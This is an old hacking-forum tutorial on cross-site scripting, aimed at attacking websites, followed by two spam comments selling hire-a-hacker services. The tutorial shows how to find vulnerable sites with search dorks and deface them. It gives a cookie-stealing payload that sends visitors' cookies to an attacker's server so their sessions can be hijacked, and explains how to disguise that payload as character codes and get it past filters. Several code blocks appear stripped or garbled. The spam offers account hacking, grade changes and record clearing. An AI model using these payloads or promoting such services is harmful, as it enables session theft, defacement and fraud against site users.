[TUT] Cross Site Scripting (XSS) Walkthrough |
11-24-2009, 04:33 PM (This post was last modified: 11-24-2009 04:39 PM by #DataBase.) Post: #1 | |||
| |||
Content: Code: - What is XSS?What is Cross Site Scripting (XSS)? Cross Site Scripting allows you to insert a malicous code into a web application. (almost with a javascript code, but it is also possible to insert other codes like PHP or HTML. It is a vulnerability which is on almost every website you can find on the WWW. In addition I will talk about 2 different ways to use XSS... 1. The attacker will include a code into a URL. The XSS will not stay on the page. 2. The attacker will be able to insert a code and it will stay on the website. Usually the attacker will choose a website with some "input fields", like shoutboxes, blogs and guestbooks. Finding XSS vulnerabilities 1. Visit http://www.google.com 2. Use "google dorks", like search.php?q= 3. Found the "right" website to inject it. The Basics of XSS A common used Cross Site Scripting injection is the following javascript code: Code: If you execute it, it will popup a message box which will say "something". Soooo, if you have found a vuln website you could test if it is vuln to XSS. Just look: Code: http://database.delete.com/search.php?q=That was a example for a javascript based XSS. But as I told you before, javascript isn't the only type of code you could use to execute a XSS. Here is a example for a HTML injection: Code: Will look like: Code: http://database.delete.com/search.php?q=You should see a bold text on the page, if the page is vulnerable to XSS. Defacment with XSS To deface a website with Cross Site Scripting (XSS) you could use the following codes: Code: Code: Code: Code: Stealing Cookies using XSS The most used method of XSS is the cookie stealing. First get a cookielogger.php (will attach it!) Okay, now we have the cookielogger.php. Upload it to your server and also create a log.txt where your logs will be stored. Make sure that it works! Search a vuln website and insert following code: (replace it with your information) Code: document.location = "http://myserver.com/cookielogger.php?c="+document.cookieNow, if the user visit the website his cookies will be stolen and sent to your cookielogger. Analyze the logger for his cookies and hijack his session. But what is if the website hasn't a such store function? See... Code: http://website.com/search.php?q=document.location = "http://myserver.com/cookielogger.php?c="+document.cookieYou will redirect the original website to your server. (you should "crypt" the URL string, because your victim could notice the malicious code included to the original URL) But how "crypt" this code to become "normal", so that your victim don't notice the redirect to your server? Easy...all you need is a String to ASCII Converter and the function char() ( http://www.easycalculation.com/ascii-hex.php ) Okay, now pick your javascript code and convert it to ASCII. Example: Code: is equal Code: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62Now, your browser only could read the code if there is a comma between the digits. Like this: Code: 60,115,99,114,105, [...]Finished! You crypted your malicious code to a "hidden" malicious code :D! Bypassing Filters But what we could do, if a webadmin has blocked some characters? Hm, we need to find another method...just write the code in a different way. Code: would be Code: ')alert("Example");Code: ')alert('Example');Code: ")alert("Example");Yeeeeeah, that is it. If you have any critic or comments on my tutorial, please write a PM or just write into this thread. ALL CREDITS GO TO #DataBase from http://www.hackforums.net COPYING ONLY ALLOWED IF CREDITS ARE GIVEN TO ME! Attachement (Cookielogger.php) Spoiler (Click to View) Other tutorials by #DataBase: [TUT] Remote/Local File Inclusion [Basic] [TUT] How to crack Steam [with images] [TuT] Read out a password with a javascript code -★ Mega Thread: Firewall's! ★- [TUT] Change icons of exe-files (with ResHacker) [TUT] How to get WinRar for Free (using ResHacker) Informations about Viruses, Worms, Trojan Horses... [Guide] Security of web application's and injecting them! #DB's Stuff |
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com
CONTACT: onlineghosthacker247 @gmail. com
ReplyDelete-Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
-Let them Help You Hack Any Website Or Database
-Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
-Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
-And All Related Services
- let them help you in recovery any lost fund scam from you
onlineghosthacker Will Get The Job Done For You
onlineghosthacker247 @gmail. com
TESTED AND TRUSTED!